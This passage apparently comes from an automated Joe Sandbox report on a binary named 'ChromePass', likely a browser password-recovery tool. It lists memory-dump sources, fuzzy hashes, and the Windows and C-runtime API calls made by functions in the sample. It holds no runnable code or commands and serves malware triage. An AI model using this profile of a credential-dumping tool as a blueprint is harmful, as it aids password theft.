                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: SHGetSpecialFolderPathW$shell32.dll
                                        • API String ID: 2574300362-880857682
                                        • Opcode ID: 914e6417c65161a671754efd666f7633fa486de93f471b79313a7543fa847c03
                                        • Instruction ID: c43605d578450a16b894aa1416a585769f7f7aef7b6ac75b942aa130e6551b8c
                                        • Opcode Fuzzy Hash: 914e6417c65161a671754efd666f7633fa486de93f471b79313a7543fa847c03
                                        • Instruction Fuzzy Hash: B6D0C9B0B80B109ED7106F20AC4E72A3BA4AB6075AFD1A536A805E12A1DB785510DF2D
                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00413AA1
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 885266447-0
                                        • Opcode ID: 9f852476a24b5e65acdbe2f2a043cc320021880029ce906e3a02554176d33ed5
                                        • Instruction ID: 59302937dc795c47711df285332407a1f8ddb343786b7b42ecfc36176e7c5e69
                                        • Opcode Fuzzy Hash: 9f852476a24b5e65acdbe2f2a043cc320021880029ce906e3a02554176d33ed5
                                        • Instruction Fuzzy Hash: 93E1F671E00218EFDF14DFA9D981AEEBBB1EF48305F14446AE405B7251E738AE81CB58
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID: EB$0$0
                                        • API String ID: 2221118986-1561797307
                                        • Opcode ID: 660e6c4b9d9fe8a994a55b909cc9ede7253a91505854f54e77cdd1d1cc9e251b
                                        • Instruction ID: 1ea76f229ebdc1aabd29d9c7becc7eefde12d6ca0c6a424e6793e001dcbd3a88
                                        • Opcode Fuzzy Hash: 660e6c4b9d9fe8a994a55b909cc9ede7253a91505854f54e77cdd1d1cc9e251b
                                        • Instruction Fuzzy Hash: ADC17D31A00229EFCF14CF65D4416AABBB1FF44315F5480AFE804AB356D739AE91CB98
                                        APIs
                                        • free.MSVCRT ref: 00407129
                                        • memcpy.MSVCRT(00000000,$!@,?,00000000,?,?,?,?,?,00402124,?), ref: 0040713A
                                        • memcpy.MSVCRT(00000000,$!@,?,?,?,?,?,?,?,00402124,?), ref: 0040716A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memcpy$free
                                        • String ID: $!@
                                        • API String ID: 2888793982-977691485
                                        • Opcode ID: f9e5b73e3dde4dca867c0553b034a14acb0ef908cd8328aefb8c0c5bc0a96aef
                                        • Instruction ID: f3f0860456a4485ef54013c7569306a12b2a47b62f6c9f3181aa3f122bf85e4b
                                        • Opcode Fuzzy Hash: f9e5b73e3dde4dca867c0553b034a14acb0ef908cd8328aefb8c0c5bc0a96aef
                                        • Instruction Fuzzy Hash: FF21D53A600600AFC7219F25C88182AB7E6FF49314720863EF996977D1D735FC51DB96
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: memset$_wcsicmpmemcpywcscmp
                                        • String ID:
                                        • API String ID: 2286356190-0
                                        • Opcode ID: 6da85085f14a2f250db9efbeae09bf6fef5951a5ac91e7cf161fe321f83001b7
                                        • Instruction ID: a1e3286667dbef44129d227948d97306a94b73f239cf382e1452ef2b17d38215
                                        • Opcode Fuzzy Hash: 6da85085f14a2f250db9efbeae09bf6fef5951a5ac91e7cf161fe321f83001b7
                                        • Instruction Fuzzy Hash: 681187B3508304AAD720DB51D845ACBB3DCAB84315F14C93FF948D61D1EB78D2498B9B
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,0040136B,?,?,?,?,00431D58,0000000C), ref: 0040587A
                                        • memset.MSVCRT ref: 0040588B
                                        • memcpy.MSVCRT(00434C08,?,00000000,00000000,00000000,00000000,00000000,?,?,0040136B,?,?,?,?,00431D58,0000000C), ref: 00405897
                                        • ??3@YAXPAX@Z.MSVCRT ref: 004058A4
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1785877139.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000F.00000002.1785852695.0000000000400000.00000002.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000434000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785877139.0000000000437000.00000040.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1785976206.000000000043B000.00000080.00000001.01000000.00000010.sdmp
                                        • Associated: 0000000F.00000002.1786004329.000000000043C000.00000004.00000001.01000000.00000010.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_400000_ChromePass.jbxd
                                        Similarity
                                        • API ID: ??2@??3@memcpymemset
                                        • String ID:
                                        • API String ID: 1865533344-0
                                        • Opcode ID: 30bbd352911dea2b85de18ef4888c87691adef2e7fefc46e84ed65210418ea22
                                        • Instruction ID: 8fa97af7e5d55286372163d9ad42e2c28c0e779296564fa3a895af7c1a6606fb
                                        • Opcode Fuzzy Hash: 30bbd352911dea2b85de18ef4888c87691adef2e7fefc46e84ed65210418ea22
                                        • Instruction Fuzzy Hash: 501160726146019FD328DF19D881A27F7E5FFD8300B60C82EE896D7785D635E811CB54
                                        APIs
                                        • SHGetMalloc.SHELL32(?), ref: 0040AA3B
                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040AA6D
                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AA81
                                        • wcscpy.MSVCRT ref: 0040AA94
                                        Similarity
                                        • API ID: BrowseFolderFromListMallocPathwcscpy
                                        • String ID:
                                        • API String ID: 3917621476-0
                                        APIs
                                        • memset.MSVCRT ref: 00407220
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,0042C68C,?,?,?,?,?,0040244B), ref: 00407239
                                        • strlen.MSVCRT ref: 0040724B
                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,0040244B,?,?,00000008), ref: 0040725C
                                        Similarity
                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                        • String ID:
                                        • API String ID: 2754987064-0
                                        APIs
                                        • memset.MSVCRT ref: 004022F5
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402312
                                        • strlen.MSVCRT ref: 00402324
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00402335
                                        Similarity
                                        • API ID: ByteCharFileMultiWideWritememsetstrlen
                                        • String ID:
                                        • API String ID: 2754987064-0
                                        APIs
                                        • wcschr.MSVCRT ref: 00407295
                                        • wcschr.MSVCRT ref: 004072A3
                                          • Part of subcall function 004071FB: memset.MSVCRT ref: 00407220
                                          • Part of subcall function 004071FB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,0042C68C,?,?,?,?,?,0040244B), ref: 00407239
                                          • Part of subcall function 004071FB: strlen.MSVCRT ref: 0040724B
                                          • Part of subcall function 004071FB: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,0040244B,?,?,00000008), ref: 0040725C
                                        Strings
                                        Similarity
                                        • API ID: wcschr$ByteCharFileMultiWideWritememsetstrlen
                                        • String ID: "
                                        • API String ID: 3380400052-123907689
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: isalnumisdigit
                                        • String ID: "
                                        • API String ID: 872979836-123907689
                                        APIs
                                        • _snwprintf.MSVCRT ref: 004052A3
                                        • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 004052B3
                                        Strings
                                        Similarity
                                        • API ID: _snwprintfmemcpy
                                        • String ID: %2.2X
                                        • API String ID: 2789212964-323797159
                                        APIs
                                        • strlen.MSVCRT ref: 0042A8A0
                                          • Part of subcall function 0040B344: RtlEnterCriticalSection.NTDLL(0043551C), ref: 0040B345
                                          • Part of subcall function 0040B344: GetCurrentThreadId.KERNEL32 ref: 0040B34B
                                          • Part of subcall function 0041DF67: memcpy.MSVCRT(0000001C,0042AD04,00000000), ref: 0041E032
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 0042A8ED
                                          • Part of subcall function 0042A7BB: strlen.MSVCRT ref: 0042A7E2
                                        Strings
                                        Similarity
                                        • API ID: CriticalSectionstrlen$CurrentEnterLeaveThreadmemcpy
                                        • String ID: MATCH
                                        • API String ID: 858963765-2366572469